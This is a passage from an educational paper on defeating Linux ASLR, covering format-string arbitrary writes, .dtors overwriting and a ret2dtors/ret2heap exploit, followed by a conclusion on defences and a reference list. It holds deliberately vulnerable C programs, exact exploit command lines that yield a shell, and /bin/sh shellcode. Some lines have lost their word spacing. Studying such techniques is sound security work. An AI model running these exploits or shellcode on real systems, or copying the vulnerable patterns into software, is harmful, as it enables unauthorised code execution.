  1580. ory locations in general using the ”one shot” method.
  1581. After that I will explain what the .dtors section is and
  1582. why it makes sense to overwrite it. Finally I combine
  1583. these to a ret2dtors attack and list an example and its
  1584. exploit.
  1585. More detailed information about format string vul-
  1586. nerabilities can be found in [Scu01] and [ger02], more
  1587. about overwriting the .dtors section in [Riv01].
  1588. 11.1 One shot
  1589. Functionslikeprintfcanbeinducedtowriteintothe
  1590. memory by the format instructions %n and %.mx. The
  1591. task of %n is to save the number of characters that have
  1592. beenprintedyet. Thetaskof%.mxistoprintexactlym
  1593. hexadecimalcharacters. Acombinationof theseformat
  1594. instructions affords the possibility to write an arbitrary
  1595. number to the memory.
  1596. An example is given in figure 32. The output of
  1597. the second printf command is 20, because the first
  1598. printf command writes 20 zeros and stores this
  1599. number in i.
  1600. So it is possible to write arbitrary numbers. The
  1601. question is now: How to write this number to an ar-
  1602. bitrary location? The format instruction %n expects a
  1603. pointer (e.g. &i in figure 32). Assume the content of
  1604. 18
  1605. int main ( void ) {
  1606. int i = 0;
  1607. printf ( ”%.10x%.10x%n\n” , i , i ,& i );
  1608. printf ( ”%i\n” , i );
  1609. }
  1610. Figure 32: oneshot1.c
  1611. an address a should be overwritten. There has to be
  1612. a way to place a pointer that points to a on the stack.
  1613. Furthermore the offset from the format string pointer
  1614. to the a pointer has to be known. Assume this offset
  1615. is f. A format string that contains the %n instruction
  1616. at the f-th position has to be created and to be passed
  1617. on to the vulnerable program. With this technique an
  1618. arbitrary address a can be overwritten.
  1619. int main ( int argc , char ∗∗argv ) {
  1620. char buff [12];
  1621. strcpy ( buff , ”AAAAAAAAAAA” );
  1622. int num = 1;
  1623. int ∗ ptr = ( int ∗) buff ;
  1624. ∗(++ ptr ) = ( int)&num;
  1625. printf ( argv [ 1 ] ) ;
  1626. printf ( ”\n%i\n” ,num );
  1627. }
  1628. Figure 33: oneshot2.c
  1629. An example is given in figure 33. The arbitrary ad-
  1630. dress a is the address &num here. It is placed in a buffer
  1631. somewhere on the stack. This address is not really ar-
  1632. bitrary (i.e. not determined by an user input) just for
  1633. simplicity.
  1634. So the address a is placed on the stack. What is still
  1635. needed is the offset f. The following line affords to
  1636. determine f:
  1637. > ./oneshot2 %x_%x_%x_\
  1638. > %x_%x_%x_%x_%x_%x_%x
  1639. 80484e0_c_b7e543ee_b7ef76d9_
  1640. 80495e0_bf973268_1_41414141_
  1641. bf97325c_414141
  1642. Thus it holds f = 9. The address of a is
  1643. bf97325c hex in this example. It is possible to write
  1644. to the address a by passing %n as the ninth format in-
  1645. struction. The following line writes the number 1234
  1646. to a:
  1647. > ./oneshot2 %.10x%.10x%.10x%\
  1648. >.10x%.10x%.10x%.10x%.1164x%n
  1649. 1234
  1650. Moreover there exists a so called short write method,
  1651. whichcanwritelargenumbersmuchfasterthantheone
  1652. shot method can do. It is described in [Scu01].
  1653. 11.2 .dtors section
  1654. Every ELF binary contains two sections: .dtors (de-
  1655. structors) and .ctors (constructors). Destructors and
  1656. constructors can be defined by the programmer (see
  1657. figure 34) or not, but the sections exist either way. A
  1658. constructor is called before main is executed and a de-
  1659. structor after the execution of main. Since a construc-
  1660. torisexecutedbeforeanyuserinputisread, thissection
  1661. is not exploitable for an attack - but the .dtors section
  1662. is.
  1663. The .dtors section is a list of addresses which point
  1664. to the destructors. This list is marked by a leading
  1665. ffffffff hex and an ending 00000000 hex . E.g. a bi-
  1666. nary dtors can be inspected by objdump as follows:
  1667. > objdump -s -j .dtors ./dtors
  1668. 80495f8 ffffffff 54840408 00000000
  1669. So the .dtors section begins at 080495f8 hex and the
  1670. location 080495fc hex points to a destructor. The code
  1671. of the destructor begins at address 08048454 hex .
  1672. An attack on the .dtors section would overwrite the
  1673. location 080495fc hex with a shellcode pointer. The
  1674. shellcode would be executed right after main exits.
  1675. 11.3 ret2dtors
  1676. Consider the C program dtors listed in figure 34. It
  1677. contains a snprintf vulnerability and the heap area
  1678. heap_buff. This area is necessary to place the shell-
  1679. code as it is not randomized. Hence the example is a
  1680. combination of ret2dtors and ret2heap.
  1681. static void my constructor ( void )
  1682. a t t r i b u t e (( constructor ) ) ;
  1683. void my constructor ( void ) {
  1684. printf ( ” Constructor\n” );
  1685. }
  1686. int main ( int argc , char ∗argv [ ] ) {
  1687. char ∗heap buff ;
  1688. heap buff = ( char ∗) malloc ( strlen ( argv [ 1 ] ) ) ;
  1689. strcpy ( heap buff , argv [ 1 ] ) ;
  1690. char buff [32];
  1691. snprintf ( buff , sizeof ( buff ) , argv [ 2 ] ) ;
  1692. buff [ sizeof ( buff )−1] = ’\0 ’ ;
  1693. }
  1694. Figure 34: dtors.c
  1695. 19
  1696. The exploit below seems to be very complicated, but
  1697. it isn’t: The first parameter for the binary dtors is
  1698. a shellcode that will be placed in heap_buff. The
  1699. second parameter contains the format string that over-
  1700. writes the .dtors section with the address of that shell-
  1701. code upon the heap. Therefore the address of the .dtors
  1702. section (080495fc hex ) is written into buff. The off-
  1703. set from the format string pointer to the first location
  1704. of buff is eight. So %n has to be the eighth format
  1705. instruction and there is room for seven %mx instruc-
  1706. tions to define the number that should be written. This
  1707. number is the first address of heap_buff, which is
  1708. 0804a008 hex . The distribution of this number is cal-
  1709. culated as follows: 0804a008 hex = 134520840 dec =
  1710. 4+6∗20000000 dec +14520828 dec +8 (inclusive the
  1711. four bytes of the heap address and eight bytes of under-
  1712. scores).
  1713. All the values I used can be determined by
  1714. objdump and gdb. The exploit works as followss:
  1715. > ./dtors ‘./shellcode‘\
  1716. > ‘perl -e ’print "\xfc\x95\x04\x08\
  1717. > _%20000000x_%20000000x_%20000000x_\
  1718. > %20000000x_%20000000x_%20000000x_\
  1719. > %14520828x_%n"’‘;
  1720. Constructor
  1721. sh-3.1$ echo heap heap hurray!
  1722. heap heap hurray!
  1723. sh-3.1$
  1724. 12 Conclusion
  1725. Summarizing I listed the following methods to exploit
  1726. ASLR: dos, brute force, ret2text, ret2bss, ret2data,
  1727. ret2heap, string and function pointer redirecting,
  1728. stack stethoscope and formatted information, ret2ret,
  1729. ret2pop, ret2esp, ret2eax and finally ret2got. Fur-
  1730. thermore I pointed at integers, off-by-ones and dtors
  1731. that are still exploitable under special circumstances
  1732. (i.e. in a combination with one of the ASLR smashing
  1733. methods listed above). Some of these techniques like
  1734. ret2text(especiallyborrowedcode), stringandfunction
  1735. pointer redirecting or ret2got are also useful to bypass
  1736. a nonexecutable stack.
  1737. So what I have shown is, that ASLR and therefore
  1738. e.g. a standard linux installation is still highly vulner-
  1739. able against memory manipulation. But ASLR is com-
  1740. plementary to other prophylactic security techniques
  1741. and a combination of these technologies could provide
  1742. a stronger defense. These technologies are mainly:
  1743. • Compiler extensions: StackGuard, StackShield,
  1744. /GS-Option, bounds checking, canary
  1745. • Library wrapper: Libsafe, FormatGuard
  1746. • Environment modification: PaX (complete
  1747. ASLR), Openwall (non-executable stack)
  1748. • [Safe programming: source code analyzer, tracer,
  1749. fuzzer]
  1750. Most of these techniques are well known for years
  1751. and provide a better protection against memory manip-
  1752. ulation than simple stack ASLR does. The question
  1753. is why they are not implemented into the linux ker-
  1754. nel and enabled by default too. The problems with
  1755. this techniques are compatibility, stability and perfor-
  1756. mance: Environment modifications slow down the ma-
  1757. chine, compiler extensions need a recompilation of ev-
  1758. ery binary to take effect and library wrapper are not
  1759. compatible to every program.
  1760. So ASLR is not the best protection, but it disturbs a
  1761. production system least. Note that there are also prob-
  1762. lems relating to ASLR: The flow is not totally deter-
  1763. ministic and this complicates debugging and crash an-
  1764. alyzing. But therefore it is possible to switch off ASLR
  1765. during runtime.
  1766. [cor05], [Kle04]
  1767. A Shellcode
  1768. char shellcode [] =
  1769. ”\x31\xc0”
  1770. ”\x50”
  1771. ”\x68”” / / sh”
  1772. ”\x68”” / bin ”
  1773. ”\x89\xe3”
  1774. ”\x50”
  1775. ”\x53”
  1776. ”\x89\xe1”
  1777. ”\x99”
  1778. ”\xb0\x0b”
  1779. ”\xcd\x80”
  1780. ;
  1781. int main ( int argc , char ∗argv [ ] ) {
  1782. void (∗ code )()=( void ( ∗ ) ( ) ) shellcode ;
  1783. code ( ) ;
  1784. }
  1785. References
  1786. [ble02] blexim. Basic Integer Overflows.
  1787. http://www.phrack.org/
  1788. archives/60/p60-0x0a.txt, 2002.
  1789. 20
  1790. [c0n06a] c0ntex. Bypassingnon-executable-stackdur-
  1791. ing exploitation using return-to-libc. http:
  1792. //www.milw0rm.com/papers/31,
  1793. 2006.
  1794. [c0n06b] c0ntex. How to hijack the Global Offset Ta-
  1795. ble with pointers for root shells. http://
  1796. www.milw0rm.com/papers/3, 2006.
  1797. [Con99] Matt Conover. w00w00 on Heap Overflows.
  1798. http://www.w00w00.org/files/
  1799. articles/heaptut.txt, 1999.
  1800. [cor05] corbet. Address space randomization in
  1801. 2.6. http://lwn.net/Articles/
  1802. 121845/, 2005.
  1803. [Dul00] Thomas Dullien. Future of Buffer Over-
  1804. flows? http://diswww.mit.edu/
  1805. menelaus/bt/17418, 2000. Bugtraq
  1806. Posting.
  1807. [Dur02] Tyler Durden. Bypassing PaX ASLR pro-
  1808. tection. http://www.phrack.org/
  1809. archives/59/p59-0x09.txt, 2002.
  1810. [Fos05] James Foster. Buffer Overflows, 2005.
  1811. [ger02] gera. Advances in format string ex-
  1812. ploitation. http://www.phrack.org/
  1813. archives/59/p59-0x07.txt, 2002.
  1814. [Kle04] Tobias Klein. Buffer Overflows und Format-
  1815. String-Schwachstellen, 2004. German.
  1816. [klo99] klog. The Frame Pointer Over-
  1817. write. http://doc.bughunter.
  1818. net/buffer-overflow/
  1819. frame-pointer.html, 1999.
  1820. [Kot05a] Izik Kotler. Advanced Buffer Overflow
  1821. Methods. http://events.ccc.
  1822. de/congress/2005/fahrplan/
  1823. attachments/538-Slides_
  1824. AdvancedBufferOverflowMethods.
  1825. ppt, 2005.
  1826. [Kot05b] Izik Kotler. Smack the Stack.
  1827. http://tty64.org/doc/
  1828. smackthestack.txt, 2005.
  1829. [Kra05] Sebastian Krahmer. x86-64 buffer overflow
  1830. exploits and the borrowed code chunks
  1831. exploitation technique. http://www.
  1832. suse.de/ ˜ krahmer/no-nx.pdf,
  1833. 2005.
  1834. [One96] Aleph One. Smashing The Stack For Fun
  1835. And Profit. http://insecure.org/
  1836. stf/smashstack.html, 1996.
  1837. [PaX03] PaX. Documentation. http://pax.
  1838. grsecurity.net/docs/, 2003.
  1839. [Riv01] Ruan Bello Rivas. Overwriting the .dtors
  1840. section. http://synnergy.net/
  1841. downloads/papers/dtors.txt,
  1842. 2001.
  1843. [San06] Mulyadi Santosa. Understanding
  1844. ELF using readelf and objdump.
  1845. http://www.linuxforums.org/
  1846. misc/understanding_elf_using_
  1847. readelf_and_objdump_3.html,
  1848. 2006.
  1849. [Scu01] Scut. Exploiting Format String Vulnerabil-
  1850. ities. http://doc.bughunter.net/
  1851. format-string/exploit-fs.html,
  1852. 2001.
  1853. [Sha04] Hovav Shacham. On the Effective-
  1854. ness of Address-Space Randomization.
  1855. http://www.stanford.edu/ ˜ blp/
  1856. papers/asrandom.pdf, 2004. et al.
  1857. [Whi07] Ollie Whitehouse. An Analysis of
  1858. ASLR on Windows Vista. http:
  1859. //www.symantec.com/avcenter/
  1860. reference/Address_Space_
  1861. Layout_Randomization.pdf, 2007.
  1862. 21
Add Comment
Please, Sign In to add comment